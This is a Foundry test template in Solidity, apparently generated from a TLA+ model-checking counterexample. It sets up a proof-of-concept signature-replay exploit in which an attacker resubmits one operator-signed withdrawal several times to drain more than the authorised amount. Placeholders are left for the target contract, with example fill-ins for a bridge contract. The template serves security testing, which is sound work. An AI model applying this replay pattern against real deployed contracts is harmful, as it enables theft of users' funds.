// SPDX-License-Identifier: MIT
pragma solidity {{PRAGMA}};

// Foundry test template - SignatureReplay shape, generated by plumbline tlc_to_forge.
//
// TLC counterexample (docs/tla/SignatureReplay.tla):
// {{TLC_TRACE_HEAD}}
//
// Asserts that {{TARGET_CONTRACT}}::{{TARGET_FN}} accepts an ECDSA-signed payload
// WITHOUT a nonce/replay-protection check, allowing the same signature to be
// submitted multiple times. Each submission drains AuthAmount, violating
// NoOverpayment.

import {Test} from "forge-std/Test.sol";
import {{{TARGET_CONTRACT}}} from "{{TARGET_PATH}}";

contract SignatureReplay_PoC is Test {
    {{TARGET_CONTRACT}} public victim;

    // The signer whose signature will be REPLAYED. Operator/oracle/admin in
    // most concrete instances. private key needed so we can sign with vm.sign.
    uint256 internal signerPk = 0xA11CE;
    address internal signer;

    // The attacker who replays. They didn't sign anything; they just submit
    // the operator's signature multiple times.
    address internal attacker = address(0xBEEF);

    function setUp() public {
        signer = vm.addr(signerPk);
        // {{SETUP_DEPLOY_BLOCK}}
        // TODO target-specific:
        // 1) deploy {{TARGET_CONTRACT}} with constructor args
        // 2) designate `signer` as the authorized operator/admin
        // 3) fund the contract with enough balance for N replays
        // Example for L1BossBridge target:
        //   IERC20 tok = IERC20(address(new L1Token()));
        //   victim = new L1BossBridge(tok);
        //   victim.setSigner(signer, true);
        //   tok.transfer(address(victim.vault()), 100 ether);
    }

    /// @notice NoOverpayment from docs/tla/SignatureReplay.tla MUST hold:
    ///         each signature pays out at most AuthAmount once. TLC's
    ///         counterexample drives paid_total[s] = k * AuthAmount for k>=2.
    ///         This test reproduces that on-chain.
    function test_SignatureReplay_exploit() public {
        // 1) Operator signs ONCE for a withdrawal of `amount` to `attacker`.
        uint256 amount = 1 ether;
        bytes memory message = _buildMessage(attacker, amount);
        bytes32 digest = _toEthSigned(keccak256(message));
        (uint8 v, bytes32 r, bytes32 s) = vm.sign(signerPk, digest);

        uint256 attackerBefore = _attackerTokenBalance();

        // 2) Attacker submits the SAME signature multiple times.
        // Buggy spec accepts each; correct spec rejects after first.
        uint256 replays = 3;
        for (uint256 i = 0; i < replays; i++) {
            vm.prank(attacker);
            // {{TARGET_FN_CALL_LINE}}
            // Example: victim.{{TARGET_FN}}(attacker, amount, v, r, s);
        }

        uint256 attackerAfter = _attackerTokenBalance();
        uint256 drained = attackerAfter - attackerBefore;

        // The drain: attacker received N x amount, not just amount.
        assertGt(drained, amount,
            "attacker should drain more than the authorized single amount");

        emit log_named_uint("replays attempted", replays);
        emit log_named_uint("attacker drained (wei)", drained);
        emit log_named_uint("authorized amount per sig (wei)", amount);
    }

    // -------- target-specific helpers, fill these in setUp/per-target --------

    function _buildMessage(address to, uint256 amount)
        internal view returns (bytes memory) {
        // TODO: replace with the target's actual message-construction logic.
        // For L1BossBridge: abi.encode(
        //   address(victim.vault()), 0, abi.encodeCall(IERC20.transferFrom,
        //     (address(victim.vault()), to, amount)));
        return abi.encode(to, amount);
    }

    function _toEthSigned(bytes32 hash) internal pure returns (bytes32) {
        // EIP-191 prefix as most contracts use ECDSA.toEthSignedMessageHash.
        return keccak256(abi.encodePacked("\x19Ethereum Signed Message:\n32", hash));
    }

    function _attackerTokenBalance() internal view returns (uint256) {
        // TODO: replace with the target's relevant balance check.
        // e.g.: return IERC20(address(victim.token())).balanceOf(attacker);
        return attacker.balance;
    }
}
